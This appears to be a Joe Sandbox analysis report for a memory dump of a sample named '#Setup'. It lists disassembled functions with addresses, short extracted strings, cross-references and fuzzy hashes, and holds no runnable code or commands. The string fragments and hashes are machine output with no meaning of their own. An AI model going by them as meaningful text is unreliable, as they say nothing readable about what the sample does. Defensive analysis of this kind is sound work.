Opcode ID: a56235c904a1022d65a5047dc7491ccc572985d465aa02eca679c8616b8cca0d
Instruction ID: ba26cec4dc87f05b5879bb44dc9983caff05ffddf74444fb18601cf3cd7a024e
Opcode Fuzzy Hash: a56235c904a1022d65a5047dc7491ccc572985d465aa02eca679c8616b8cca0d
Instruction Fuzzy Hash: D3C1387174C3918BC325CF39849176BBFE2AFD2254F188A6DE8D04B342D779850AC796

Function 02973BAB Relevance: 10.3, Strings: 8, Instructions: 307COMMON

Download Yara Rule

Strings

{E, xrefs: 02973E22
DAyG, xrefs: 02973BBB
Fu, xrefs: 02973E1A
I~tt, xrefs: 02973BCB
{, xrefs: 02973CA5
pt", xrefs: 02973CF9
ZjYK, xrefs: 02973C3A
Thm], xrefs: 02973BDB

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: DAyG$Fu$I~tt$Thm]$ZjYK$pt"${${E
API String ID: 0-694594015
Opcode ID: f893b3c4bcc7ded7b0da8ee12a2730eb6374ccb9a88af63fc4f944ceb2a53808
Instruction ID: 19f56468c5f481b9e9362e326944f95752a89d206d0f3923c70c2b668f50e47f
Opcode Fuzzy Hash: f893b3c4bcc7ded7b0da8ee12a2730eb6374ccb9a88af63fc4f944ceb2a53808
Instruction Fuzzy Hash: E5A1CEB150C3908FE329CF25859136BBFE1AFE2344F2889ADE1E54B251D779840ACB57

Function 0296A8E4 Relevance: 6.5, Strings: 4, Instructions: 1496COMMON

Download Yara Rule

Strings

0325, xrefs: 0296A905
gd, xrefs: 0296AC83
0325, xrefs: 0296ADED
0325, xrefs: 0296B7BA

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 0325$0325$0325$gd
API String ID: 0-2849871301
Opcode ID: 8c605a61f870c5fdcd8621b8f5cf02120b52fe0c1e86fe960528a499d37dd272
Instruction ID: 5ae6a1246e6ce0e0bd7ee7afb85ab47009212ff9df1bf44d9e0e99c27c2fb7de
Opcode Fuzzy Hash: 8c605a61f870c5fdcd8621b8f5cf02120b52fe0c1e86fe960528a499d37dd272
Instruction Fuzzy Hash: 38925675A083809FE714CF65C89873BBBE6FBD6308F18C92CE69497291E7759801CB52

Function 02977CFF Relevance: 6.3, Strings: 5, Instructions: 88COMMON

Download Yara Rule

Strings

gKIl, xrefs: 02977DEC
tXsx, xrefs: 02977DD4
l`jT, xrefs: 02977DE4
#(^}, xrefs: 02977DCC
ez]t, xrefs: 02977DDC

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: #(^}$ez]t$gKIl$l`jT$tXsx
API String ID: 0-2617478431
Opcode ID: 774681a9eec7cac27cd93e2aa4088014606fb42b203f9f78a3252f43d0bab3a6
Instruction ID: 25c6b21ade4ec439641a882416c33fc9a593cd129340b7bb5d4b950f4e370ad9
Opcode Fuzzy Hash: 774681a9eec7cac27cd93e2aa4088014606fb42b203f9f78a3252f43d0bab3a6
Instruction Fuzzy Hash: 4E3124B294D3808BC7249F62858264BFBE2ABC2B54F209D2CE1915B294D775C946CF4B

Function 029896A4 Relevance: 5.8, Strings: 4, Instructions: 801COMMON

Download Yara Rule

Strings

(BC@, xrefs: 02989790
QFGD, xrefs: 029896FC
A~, xrefs: 02989AD9
c`af, xrefs: 02989EA6

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: (BC@$A~$QFGD$c`af
API String ID: 0-315793478
Opcode ID: 98a641996d38a82136e576588cad78e9475ae7b54ceb6e4c1dfb34838e9f4a12
Instruction ID: 8c454ffa49f249a66af50ac8ac1d3bb96d74bc43f577ceeaee30745ff994a73b
Opcode Fuzzy Hash: 98a641996d38a82136e576588cad78e9475ae7b54ceb6e4c1dfb34838e9f4a12
Instruction Fuzzy Hash: 644202726083418BE314DF69C88176BBBE6EFC9314F18892DF595CB391E778D8058B52

Function 0298777D Relevance: 5.4, Strings: 4, Instructions: 395COMMON

Download Yara Rule

Strings

2, xrefs: 02987BAD
0, xrefs: 02987BA5
5, xrefs: 02987BB1
3, xrefs: 02987BA9

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 0$2$3$5
API String ID: 0-3707080911
Opcode ID: 0f3b87d49409243b96230df3a4d64f78b2462c68fb062dc827bfe110ee7146a7
Instruction ID: dba9d9142759abfb068b41099cd8fff656c6c3ff2d8b7426604cf22f169b5a26
Opcode Fuzzy Hash: 0f3b87d49409243b96230df3a4d64f78b2462c68fb062dc827bfe110ee7146a7
Instruction Fuzzy Hash: 24123B20508BC28EDB26CE3C88983497F915B67224F1D83D8D9F55F3DBC3A98946C766

Function 02987E56 Relevance: 5.3, Strings: 4, Instructions: 336COMMON

Download Yara Rule

Strings

3, xrefs: 02988181
5, xrefs: 02988189
0, xrefs: 0298817D
2, xrefs: 02988185

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 0$2$3$5
API String ID: 0-3707080911
Opcode ID: b3990a0331c883b6c892b131865f13a910762ffc9f798a6eaf15b45dd5f61ef7
Instruction ID: 1d18c199e2d3e3a96f2a3e4fe168d1714b52eee0c3d3729b6f06ea6339ea346e
Opcode Fuzzy Hash: b3990a0331c883b6c892b131865f13a910762ffc9f798a6eaf15b45dd5f61ef7
Instruction Fuzzy Hash: E3E1E2215087D18ED326CB3C8858B597FD26B56324F0E86EDD4E95F3E3C2798906C762

Function 0297D60D Relevance: 4.4, Strings: 3, Instructions: 609COMMON

Download Yara Rule

Strings

X+^), xrefs: 0297DBC4
{rq, xrefs: 0297DBE7
MSW, xrefs: 0297DBAF

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: {rq$MSW$X+^)
API String ID: 0-550153541
Opcode ID: 389be519b1a6aa1dd6a081fd6298ae35db771256929ea980978dddd7fc7ac7a8
Instruction ID: 4a6570c84343eb0fd5030eee27348bda4c70fefa66d789d7a101a48faae6e8c3
Opcode Fuzzy Hash: 389be519b1a6aa1dd6a081fd6298ae35db771256929ea980978dddd7fc7ac7a8
Instruction Fuzzy Hash: 211297B49047808FE325AF39C596B52BFB1BF42200F19869DD4E60F796D335940ACBA2

Function 0298A384 Relevance: 4.3, Strings: 3, Instructions: 530COMMON

Download Yara Rule

Strings

0325, xrefs: 0298A60A
0325, xrefs: 0298A58C, 0298A924
0325, xrefs: 0298A42F

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 0325$0325$0325
API String ID: 0-821779498
Opcode ID: 69a397b8337910d70ee67727f4054e9c6922986697313cd631a881c788489828
Instruction ID: 10c67ee0d0c5ab7c66af466f54ffcc2a5ebeb0bf2bae45caf6b4885b3c879964
Opcode Fuzzy Hash: 69a397b8337910d70ee67727f4054e9c6922986697313cd631a881c788489828
Instruction Fuzzy Hash: CBE15436B093618BD724EE28CC8076FB7A6ABC5314F1D862DE9A857295D7389C01C7D2

Function 02976F24 Relevance: 4.0, Strings: 3, Instructions: 241COMMON

Download Yara Rule

Strings

YF, xrefs: 029771B9
AC, xrefs: 0297703E
EG, xrefs: 02977046

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: AC$YF$EG
API String ID: 0-4028915260
Opcode ID: e09ee8be34aa7bdb07d3769f57d08b4601ee1cac44dadca27276d674aed50867
Instruction ID: 5c3e82f888898106154a2fd898c42527dea8b82377c7e3d7e19e24f24ca5029f
Opcode Fuzzy Hash: e09ee8be34aa7bdb07d3769f57d08b4601ee1cac44dadca27276d674aed50867
Instruction Fuzzy Hash: 7E7123B06083408BD714EF68D8916ABBBF2FFC2354F14992CE5D18B3A1E775850ACB56

Function 02979E06 Relevance: 3.9, Strings: 3, Instructions: 175COMMON

Download Yara Rule

Strings

)}ky, xrefs: 02979E23
`grq, xrefs: 02979E4C
amen, xrefs: 02979E1B

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: )}ky$`grq$amen
API String ID: 0-2916630643
Opcode ID: 8d5fdb93ba3672c92bc0a34ffca9a3c877d16737045b19973931493efb413a62
Instruction ID: 7289c78621a98e78666de67fc5a9d6312e168f766b29051f0f4cbb1c73409368
Opcode Fuzzy Hash: 8d5fdb93ba3672c92bc0a34ffca9a3c877d16737045b19973931493efb413a62
Instruction Fuzzy Hash: 0151F3B18083819FE710DF68C8857ABBBE6EF96200F15891DF9D58B391E735D909CB42

Function 02989134 Relevance: 3.9, Strings: 3, Instructions: 162COMMON

Download Yara Rule

Strings

,, xrefs: 0298914C
V, xrefs: 029891C8
;, xrefs: 029891D2

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ,$;$V
API String ID: 0-3063747175
Opcode ID: 1310293f2e111ec2b52f49979bdecdbb1b76ab71e53138dbf3e146c925d895eb
Instruction ID: 65d5de30b50e5ab95219479d6012dbc665636dffa2dc6c1316605ea2727d5736
Opcode Fuzzy Hash: 1310293f2e111ec2b52f49979bdecdbb1b76ab71e53138dbf3e146c925d895eb
Instruction Fuzzy Hash: A9512332A0C3018FE714DA38C98037FB7D2ABC5354F1C8A2EE88A87781D674D941C746

Function 0296A119 Relevance: 3.8, Strings: 3, Instructions: 82COMMON

Download Yara Rule

Strings

%, xrefs: 0296A121
e{, xrefs: 0296A1A4
e{, xrefs: 0296A126

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: %$e{$e{
API String ID: 0-2844650870
Opcode ID: 4b15297e0d5f69b671f42f7d7e749a5cd6a4285943742ba511752f9f16cb7612
Instruction ID: 0453f12e781f0a998e7161ce784ae400ff8f3c778cf591cbdb42e5d55dc23cc6
Opcode Fuzzy Hash: 4b15297e0d5f69b671f42f7d7e749a5cd6a4285943742ba511752f9f16cb7612
Instruction Fuzzy Hash: E4215B762487404FC7089E3848A127EBAD3ABDA324F2A0A7DE4D6A73C1CF7C85068711

Function 0297164D Relevance: 3.3, Strings: 2, Instructions: 842COMMON

Download Yara Rule

Strings

EG, xrefs: 02971BB9
]_, xrefs: 02971BE6

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: EG$]_
API String ID: 0-3866315972
Opcode ID: 1fd720b4f798266a519acc8e3b4740919b9343cdc63a13435f3152537eb1bfb2
Instruction ID: 49c888333bc0e01b006f6f6bdeb7bc213ae65c1bd29839cbc6446db19ad92fe7
Opcode Fuzzy Hash: 1fd720b4f798266a519acc8e3b4740919b9343cdc63a13435f3152537eb1bfb2
Instruction Fuzzy Hash: 472213B19002648BDF28CF69C8927BEB7B2FF55314F29865CD88A6F395E3345942CB50

Function 02956424 Relevance: 3.3, Strings: 2, Instructions: 830COMMON

Download Yara Rule

Strings

0, xrefs: 02956D61
8, xrefs: 02956D59

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 7c6ad54dcc79d193badd8472509ac9616c0c6431281f416468331de41acf5d1d
Instruction ID: 79973f85dc8e1adb150e5e290ec83d22b46cfa69e1f0760172508ff55622522b
Opcode Fuzzy Hash: 7c6ad54dcc79d193badd8472509ac9616c0c6431281f416468331de41acf5d1d
Instruction Fuzzy Hash: 197267716083509FD714CF18C880BABBBE6AFC8314F48892DF9898B391D775D949CB92

Function 02972624 Relevance: 3.3, Strings: 2, Instructions: 774COMMON

Download Yara Rule

Strings

,, xrefs: 02972D2C
!@, xrefs: 02972694

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: !@$,
API String ID: 0-2321553346
Opcode ID: 8327ace0fee32016651cc43a7d248107937806dcf149944011df0c62645795e3
Instruction ID: d1ff7f4ce0f464933ebd35c598603af5afc84002837d683303e9be7b72c1c222
Opcode Fuzzy Hash: 8327ace0fee32016651cc43a7d248107937806dcf149944011df0c62645795e3
Instruction Fuzzy Hash: 0252F172E146518FDB14CF7CC8553AEBBF2AF89320F198669D8A5AB3D1D7348841CB81

Function 0295ADE4 Relevance: 2.9, Strings: 2, Instructions: 406COMMON

Download Yara Rule

Strings

pmta, xrefs: 0295AFE7
hyov, xrefs: 0295B081, 0295B085, 0295B0C4

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: hyov$pmta
API String ID: 0-2092954478
Opcode ID: 454dd73e0f6346e276ace300e739dfc33ea582a9236a24378131082bbfacdc34
Instruction ID: 75d5b241ef716ad991519bf5e687ef1c3e0bfca6782453992b2b8b8bbe72b2c0
Opcode Fuzzy Hash: 454dd73e0f6346e276ace300e739dfc33ea582a9236a24378131082bbfacdc34
Instruction Fuzzy Hash: C9C1F5B16083508BE718CF34C8506ABBBE6EBD5314F148A2DE9E58B395D638C909CB56

Function 0295BFF4 Relevance: 2.9, Strings: 2, Instructions: 369COMMON

Download Yara Rule

Strings

W, xrefs: 0295C019
eb, xrefs: 0295C182

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: W$eb
API String ID: 0-4092369325
Opcode ID: e7f80ee43cc7e9747476ebb4d444c0ebe7554d3f2c9c86fc2a2eaaf5f0996078
Instruction ID: 22d9a158450e308b45f876aaa7cb0ceb2dc1cfb1658405d9a70dcb94af63cde9
Opcode Fuzzy Hash: e7f80ee43cc7e9747476ebb4d444c0ebe7554d3f2c9c86fc2a2eaaf5f0996078
Instruction Fuzzy Hash: AFB1147134C3948BD724CFA8849167FFBE2EBC2214F18892DE9E95B381D7318509CB96

Function 0297EA21 Relevance: 2.8, Strings: 2, Instructions: 344COMMON

Download Yara Rule

Strings

KaTN, xrefs: 0297EB88
_U@J, xrefs: 0297EC63

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: KaTN$_U@J
API String ID: 0-4017033737
Opcode ID: d631473f9886d0a4fc7e998275bd2d2b8ec735235ff5dae5ec01516eed27683c
Instruction ID: eb689fd88b0224bb8490b67d98fe6573281f462639a71ad340d9b24563fb6cc3
Opcode Fuzzy Hash: d631473f9886d0a4fc7e998275bd2d2b8ec735235ff5dae5ec01516eed27683c
Instruction Fuzzy Hash: 55A1B3746047828FD72ACF2AC490722FBE2BF9A300F18859DD4DA8B792D735A416CB54

Function 02968AAE Relevance: 2.8, Strings: 2, Instructions: 324COMMON

Download Yara Rule

Strings

L, xrefs: 02968B34
<9, xrefs: 02968B24

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: <9$L
API String ID: 0-802190843
Opcode ID: 2ff5a69eff546df6c11b4e2280c1998f5fedc844a153de1cd363b3c1d5e046cc
Instruction ID: 4a4563c8464292d58b4755083a59c2236e6fabd6ef927502b7c3d697d5886c6d
Opcode Fuzzy Hash: 2ff5a69eff546df6c11b4e2280c1998f5fedc844a153de1cd363b3c1d5e046cc
Instruction Fuzzy Hash: E2B1F8716093118BC714CF28C89176BB7E2FFC8724F148A2DE8D99B394E7389945CB52

Function 029685FC Relevance: 2.8, Strings: 2, Instructions: 310COMMON

Download Yara Rule

Strings

89>, xrefs: 029687F1
}&'$, xrefs: 02968667

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: }&'$$89>
API String ID: 0-3274491690
Opcode ID: 1d3034caf3ac77cde51ef8e0d43b7ab3682a6716a8d9a270cd3647502dd829d9
Instruction ID: 47b9baf587bd6117bafe7b334fe7b5f3fefa9ef0cd6628e6d9b4f5dff49b1eff
Opcode Fuzzy Hash: 1d3034caf3ac77cde51ef8e0d43b7ab3682a6716a8d9a270cd3647502dd829d9
Instruction Fuzzy Hash: D881FF71A083128BC7248F28C4917BBB7E2FFC9754F188A2DE4C94B7A5E7788945C746

Function 0295DF97 Relevance: 2.8, Strings: 2, Instructions: 262COMMON

Download Yara Rule

Strings

Fu, xrefs: 0295E1CF
{E, xrefs: 0295E1DA

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: Fu${E
API String ID: 0-3143635830
Opcode ID: e649ce8c3fba0ddede7a13ee43caa47bb84e3e677f437216d7aa3242e24d2107
Instruction ID: 206a4ddf41c73992a0e3387b08f0269a2651e93f96f59047e89dc59c9fbb8078
Opcode Fuzzy Hash: e649ce8c3fba0ddede7a13ee43caa47bb84e3e677f437216d7aa3242e24d2107
Instruction Fuzzy Hash: FF81AFB024D3D18AD335CF24C5947EFBBE1ABD6344F184A6DC8DA5B251C37A0606CB56

Function 0295EC46 Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

YV, xrefs: 0295EC99
, xrefs: 0295EDB2

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: $YV
API String ID: 0-3701709064
Opcode ID: 9455ec4c6bf4496bef0e41d6f472c149c804f3e770f1390c352b734600423908
Instruction ID: 1f51bf137dbbbc014afb7b29ff98ef99a4a588f99d570cb85bb023a2704fc893
Opcode Fuzzy Hash: 9455ec4c6bf4496bef0e41d6f472c149c804f3e770f1390c352b734600423908
Instruction Fuzzy Hash: 8551CC71A083D14BD721CF28C8517EFBBE1AF9A310F094ABCD8D9D3292E73056468B42

Function 02991504 Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

@, xrefs: 029915C8
RMLO, xrefs: 029915E6

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: @$RMLO
API String ID: 0-691185593
Opcode ID: afdfe084f7f0e32841710c0f62b7152eff5233ec7b34d2a670ad2cf85b7aace2
Instruction ID: 342eb515f8bc6018dbacc58e07ce04e7e8c6f8a365e6cf5758028d4929764257
Opcode Fuzzy Hash: afdfe084f7f0e32841710c0f62b7152eff5233ec7b34d2a670ad2cf85b7aace2
Instruction Fuzzy Hash: 1F41E1B1A043018BDB14CF28C84576BB7E6FF86728F1A962CE9995B3D0D734D905CB86

Function 0295B314 Relevance: 2.6, Strings: 2, Instructions: 80COMMON

Download Yara Rule

Strings

1>, xrefs: 0295B389
?P~, xrefs: 0295B390

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 1>$?P~
API String ID: 0-3428491240
Opcode ID: 5eb0481876784886bdb35cc39cfd562a9e26d063b678f585c1a674e441e6fa3e
Instruction ID: 3c80379d9c10ee22c03f87323c3c9080c354ab6829d8ce090a530c087ef1ecfc
Opcode Fuzzy Hash: 5eb0481876784886bdb35cc39cfd562a9e26d063b678f585c1a674e441e6fa3e
Instruction Fuzzy Hash: B221657970A3800BD314DF20D8916EB77A3EBC6308F08963CA5C197385CB79890ADB4A

Function 02960A86 Relevance: 2.3, Strings: 1, Instructions: 1088COMMON

Download Yara Rule

Strings

+, xrefs: 0296161E

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: +
API String ID: 0-2126386893
Opcode ID: a8b875d785d0c4b5ee63500c938016a5b97bb49d04baf42b8e9dac96b6cb2673
Instruction ID: 61f897b528c956616390039aba0e6bd40b092db6080408bf60067ccb8decb2c8
Opcode Fuzzy Hash: a8b875d785d0c4b5ee63500c938016a5b97bb49d04baf42b8e9dac96b6cb2673
Instruction Fuzzy Hash: C992C471604B408FD764DB38C9993ABBBE2AF95310F088A3DD4EF87781E674A545CB02

Function 0298D544 Relevance: 1.9, Strings: 1, Instructions: 624COMMON

Download Yara Rule

Strings

f, xrefs: 0298D765

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: 143fcd88b8c6df00d52254af831749df60a1614fa927ac42990dad2fa38ca557
Instruction ID: 780b717b5a7d68de09fabdacf1831c84d310ab868efdf5147617f6668b9da7da
Opcode Fuzzy Hash: 143fcd88b8c6df00d52254af831749df60a1614fa927ac42990dad2fa38ca557
Instruction Fuzzy Hash: BA12CF716093418FD714DF28C890B2BBBE6ABCA714F188A2CE5D5972D2D771EC05CB62

Function 029733B4 Relevance: 1.7, Strings: 1, Instructions: 486COMMON

Download Yara Rule

Strings

fVW, xrefs: 029735F4

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: fVW
API String ID: 0-2129365089
Opcode ID: 21a6da9dca7cbf39a2c5f306190b41b40a01c4cd332e470cbc51f8c65fcbdacd
Instruction ID: 64f7e7e8941fd40074b6c34f751dd3c9bea8b960ea32995fb54529c59baf5c03
Opcode Fuzzy Hash: 21a6da9dca7cbf39a2c5f306190b41b40a01c4cd332e470cbc51f8c65fcbdacd
Instruction Fuzzy Hash: 3DC147B2A083115BDB18DF388C4266BB3E5EF80324F19897CE9C997381E738D905C796

Function 0297BB54 Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

", xrefs: 0297BE3C

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 932db1743debe52a8a0b6e39bb7bcb0760c55f06a934da3fc02c03a1399d717e
Instruction ID: 80de1292b3cead86aa259b4c15ee32a5b1bfb5748b02eced084b5b082b6a64ed
Opcode Fuzzy Hash: 932db1743debe52a8a0b6e39bb7bcb0760c55f06a934da3fc02c03a1399d717e
Instruction Fuzzy Hash: C9C107B2A083509FD714DE24C460B6BB7EAAFC5318F18892DE9998B381E734D944CBD1

Function 02965874 Relevance: 1.6, Strings: 1, Instructions: 379COMMON

Download Yara Rule

Strings

sM, xrefs: 02965A61

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: sM
API String ID: 0-1302726119
Opcode ID: e37ea9eed592954b48b5d033aa4bf71d75a5250fa6a165b07ad2ceefd1608d22
Instruction ID: 2e169966b407659ad165d4f120f416cc4726f6387120f001e743f45031822058
Opcode Fuzzy Hash: e37ea9eed592954b48b5d033aa4bf71d75a5250fa6a165b07ad2ceefd1608d22
Instruction Fuzzy Hash: DD9101726143058BDB18DF28CCA67BB73E1EF85324F5A992CE886CB2A1F7789504C745

Function 02990E84 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

dg`a, xrefs: 02990F5A, 02990FCB

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: dg`a
API String ID: 0-2278578308
Opcode ID: 69dc7ee35370dc82f749b63821154ec4415a3f0be6f838c04ce05bf767e320db
Instruction ID: b2d943d0c6c918e54df73cffb2c9c5ef1a92998bbe7514f8e6cfc4ec0c65a4ce
Opcode Fuzzy Hash: 69dc7ee35370dc82f749b63821154ec4415a3f0be6f838c04ce05bf767e320db
Instruction Fuzzy Hash: 259135316083519BDB28CF28D89166FBBE6EBC5324F19C53CE9AA87391D7319C05CB91

Function 02990B44 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

mbkh, xrefs: 02990B46

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: mbkh
API String ID: 0-1715188874
Opcode ID: e70fa066eff81f7b6f911f3de37881f4edc206f725785701ebf2b999dc4edd63
Instruction ID: 79fb12c55625ca8979403ae1bd829f326b160e53629dc0b2faa2f9b741afd23b
Opcode Fuzzy Hash: e70fa066eff81f7b6f911f3de37881f4edc206f725785701ebf2b999dc4edd63
Instruction Fuzzy Hash: 0091D235A083519BCB25DF2CC88062BB7E6FF89724F05892CE9A557391E732EC50C791

Function 0296E224 Relevance: 1.5, Strings: 1, Instructions: 295COMMON

Download Yara Rule

Strings

~, xrefs: 0296E2EA

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 021b4750080ef25cfd327e1cfac7361f1b82c93988b73062807e44a04fb4b903
